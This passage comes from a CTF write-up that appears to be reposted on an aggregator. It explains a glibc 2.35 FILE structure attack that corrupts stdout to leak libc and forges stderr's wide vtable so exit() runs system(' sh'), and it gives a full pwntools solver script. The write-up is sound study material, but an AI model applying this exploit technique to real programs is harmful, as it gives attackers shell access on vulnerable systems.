                     |_ (_IO_WIDE_JUMPS_FUNC(fp)->__doallocate) (fp)
                         |_ (_IO_WIDE_JUMPS(fp)->__doallocate) (fp) <- No Validation #profit :D

Notes that to achieve this call, there are some constraints that we need to fulfill:

  • In _IO_wfile_overflow, we need to bypass these checks to continue calling _IO_wdoallocbuf:
    • if (f->_flags & _IO_NO_WRITES) need to return False.
    • if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0) need to return True.
    • if (f->_wide_data->_IO_write_base == 0) need to return True.
  • In _IO_wdoallocbuf, we need to bypass these checks to continue calling _IO_WDOALLOCATE:
    • if (fp->_wide_data->_IO_buf_base) need to return False.
    • if (!(fp->_flags & _IO_UNBUFFERED)) need to return True.
      • _IO_UNBUFFERED is 0x0002, which means _flags & _IO_UNBUFFERED == 0needs to be achieved.

And if those constraints are fulfilled, it will jump to the pointer stored in the fp->_wide_data->wide_vtable->__doallocate, where the rdi is a pointer to the FILE itself (fp).

Finally, this is a path that we could take to do FILE Structure Attack in glibc 2.35. For example, we can simply create a fake wide_vtable so that the __doallocate will point to system, which mean when we call _IO_WDOALLOCATE(fp), it will do system(fp). And if we forge the fp content to execute sh, that means we will get a shell 😀

But first, how can we able to trigger _IO_OVERFLOW in the first place? We can abuse the third menu from the binary, which is exit. You can read the detail about the chain in my previous article about FILE Structure Attack, but the tl;dr is when we call exit, the binary will have a chain call like this:

1
2
3
4
5
exit
|_ _IO_cleanup
   |_ _IO_flush_all_lockp
      Iterate list of available files (stderr->stdout->stdin), and on each iteration it will call:
      |_ _IO_OVERFLOW (fp, EOF)

The constraint to call _IO_OVERFLOW is here (taken from the _IO_flush_all_lockp code):

  • if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
    • So, we need to set _mode to 0, and _IO_write_ptr > _IO_write_base

Because exit will iterate all available files, I choose to use the OOB write bug to overwrite the file structure of the stderr. To summarize, what should we do to stderr file structure to gain RCE upon exit are:

  • Create a fake _wide_vtable.
    • I decided to put it in my chunk_addr+0x100 address. Notes that our chunk_addr is in libc_base - 0xf7ff0.
    • __doallocate offset is 0x68, so fill chunk_addr+0x100+0x68 with system address.
  • Create a fake _wide_data.
    • I decided to put it in chunk_addr.
    • Set chunk_addr->_IO_write_base (which is &chunk_addr+0x20) to 0.
    • Set chunk_addr->_IO_buf_base (which is &chunk_addr+0x38) to 0.
    • Set chunk_addr->_wide_vtable (which is &chunk_addr+0xe0) to chunk_addr+0x100(which is our fake_wide_vtable).
  • Set the stderr->_flags to the correct value. Some important notes:
    • Remember that at the end, because we forge the wide_vtable->__do_allocate(stderr) to system(stderr), that means the command that will be executed by system will start from stderr->_flags (because _flags is &stderr+0x0). We need to ensure that the _flags still fulfill the constraints, yet it’s able to execute our command. Some tricks that can be used:
      • kylebot set the _flags to 0x3b01010101010101, and _IO_read_ptr to /bin/sh\x00.
        • 0x3b01010101010101 equivalent to \x01\x01\x01\x01\x01\x01\x01;, so by setting it like above, the final call will be system('\x01\x01\x01\x01\x01\x01\x01;/bin/sh'), which will trigger a shell, yet all of the if conditions constraints are fulfilled.
      • roderick01 set the _flags to ” sh” (with double space in front). This still fulfill the constraints, and will call system(" sh") at the end.
  • Set the stderr->_IO_write_base to 0, and the stderr->_IO_write_pr to 1.
    • So that when we call exit, _IO_flush_all_lockp will call _IO_OVERFLOW(stderr, EOF).
  • Set the stderr->vtable to _IO_wfile_jumps.
    • So that when _IO_OVERFLOW(stderr, EOF) is called, instead of calling _IO_new_file_overflow, it will call _IO_wfile_overflow instead.

And after we successfully rewrite the stderr file structure, if we call exit, we should be able to get a shell!

Finally, let’s start to continue our script to implement those actions. First, create a fake _wide_vtable.

1
2
3
4
5
6
# Setup fake _wide_vtable
fake_wide_vtable_addr                         = chunk_addr + 0x100
fake_wide_vtable_doallocate_offset_from_chunk = (fake_wide_vtable_addr - chunk_addr) + 0x68
system_addr                                   = libc.symbols['system']
for i, num in enumerate(p64(system_addr)):
    edit(r, fake_wide_vtable_doallocate_offset_from_chunk+i, num)

Now, create a fake _wide_data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# Setup fake _wide_data
fake_wide_data_addr                            = chunk_addr
fake_wide_data_IO_write_base_offset_from_chunk = (fake_wide_data_addr - chunk_addr)+0x20
fake_wide_data_IO_buf_base_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0x38
fake_wide_data_wide_vtable_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0xe0
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_write_base_offset to 0
    edit(r, fake_wide_data_IO_write_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_buf_base_offset to 0
    edit(r, fake_wide_data_IO_buf_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(fake_wide_vtable_addr)): # Set _wide_data->_wide_vtable to fake_wide_vtable_addr
    edit(r, fake_wide_data_wide_vtable_offset_from_chunk+i, num)

Now, forge the stderr.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# Forge stderr
fake_stderr                = FileStructure(0)
fake_stderr.flags          = u64(b'  sh\x00\x00\x00\x00')
fake_stderr._IO_write_base = 0
fake_stderr._IO_write_ptr  = 1 # _IO_write_ptr > _IO_write_base
fake_stderr._wide_data     = fake_wide_data_addr
fake_stderr.vtable         = libc.symbols['_IO_wfile_jumps']
fake_stderr_bytes = bytes(fake_stderr)
for i, num in enumerate(fake_stderr_bytes):
    edit(r, stderr_offset_from_chunk+i, num)

Exit, and profit 😀

1
2
# Exit and profit :D
exit_binary(r)

 

STACK the Flags CTF 2022

 

Below is the full script for my solver:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
from pwn import *

exe = ELF("cursed_grimoires_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

remote_url = "157.230.242.192"
remote_port = 30472
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = process([exe.path], env={})
        if args.PLT_DEBUG:
            gdb.attach(r, gdbscript=gdbscript)
            pause()
    else:
        r = remote(remote_url, remote_port)

    return r

r = conn()

def create(r, size, content):
    r.sendlineafter(b'=> ', b'1')
    r.sendlineafter(b'=> ', str(size).encode())
    r.sendlineafter(b'=> ', content)

def edit(r, offset, val):
    r.sendlineafter(b'=> ', b'2')
    r.sendlineafter(b'=> ', str(offset).encode())
    r.sendlineafter(b'=> ', bytes([val]))

def exit_binary(r):
    r.sendlineafter(b'=> ', b'3')
    r.interactive()

# Create a big chunk, so that our chunk is located on the newly page
# created by mmap (To be precise, at libc_base-0xf7ff0)
chunk_size      = 1000000
offset_to_libc  = 0xf7ff0
create(r, chunk_size, b'a'*8)

'''
Leak libc base via stdout
'''
# Prepare the correct offset for stdout and stderr
stdout_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stdout_']
stderr_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stderr_']
log.info(f'Stdout offset: {hex(stdout_offset_from_chunk)}')
log.info(f'Stderr offset: {hex(stderr_offset_from_chunk)}')

# Overwrite stdout->_flags to 0x1800
flags_offset = 0x0  # stdout->_flags  = &stdout + 0x0
flags = p32(0x1800)
for i in range(len(flags)):
    edit(r, stdout_offset_from_chunk+flags_offset+i, flags[i])

# Overwrite stdout->_IO_write_ptr to be larger than
write_ptr_offset = 0x28 # stdout->_IO_write_ptr = &stdout + 0x28
write_ptr_lsb    = 0x50 # You can choose any value. I choose 0x50
edit(r, stdout_offset_from_chunk+write_ptr_offset, write_ptr_lsb)

# Now, when the binary called menu() (which will call puts())
# It will leak a libc address, which equivalents to _IO_stdfile_1_lock
out = r.recv(16)[5:]
leaked_libc = u64(out[:8])
log.info(f'Leaked libc  : {hex(leaked_libc)}')
libc_base = leaked_libc-libc.symbols['_IO_stdfile_1_lock']
log.info(f'Libc base    : {hex(libc_base)}')
libc.address = libc_base
chunk_addr = libc_base - 0xf7ff0
log.info(f'Chunk addr   : {hex(chunk_addr)}')

'''
Getting RIP Control via exit through stderr
'''
# Setup fake _wide_vtable
fake_wide_vtable_addr                         = chunk_addr + 0x100
fake_wide_vtable_doallocate_offset_from_chunk = (fake_wide_vtable_addr - chunk_addr) + 0x68
system_addr                                   = libc.symbols['system']
for i, num in enumerate(p64(system_addr)):
    edit(r, fake_wide_vtable_doallocate_offset_from_chunk+i, num)

# Setup fake _wide_data
fake_wide_data_addr                            = chunk_addr
fake_wide_data_IO_write_base_offset_from_chunk = (fake_wide_data_addr - chunk_addr)+0x20
fake_wide_data_IO_buf_base_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0x38
fake_wide_data_wide_vtable_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0xe0
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_write_base_offset to 0
    edit(r, fake_wide_data_IO_write_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_buf_base_offset to 0
    edit(r, fake_wide_data_IO_buf_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(fake_wide_vtable_addr)): # Set _wide_data->_wide_vtable to fake_wide_vtable_addr
    edit(r, fake_wide_data_wide_vtable_offset_from_chunk+i, num)

# Forge stderr
fake_stderr                = FileStructure(0)
fake_stderr.flags          = u64(b'  sh\x00\x00\x00\x00')
fake_stderr._IO_write_base = 0
fake_stderr._IO_write_ptr  = 1 # _IO_write_ptr > _IO_write_base
fake_stderr._wide_data     = fake_wide_data_addr
fake_stderr.vtable         = libc.symbols['_IO_wfile_jumps']
fake_stderr_bytes = bytes(fake_stderr)
for i, num in enumerate(fake_stderr_bytes):
    edit(r, stderr_offset_from_chunk+i, num)

# Exit and profit :D
exit_binary(r)

 

原文始发于Chovid99:STACK the Flags CTF 2022

版权声明:admin 发表于 2022年12月8日 下午9:10。
转载请注明:STACK the Flags CTF 2022 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...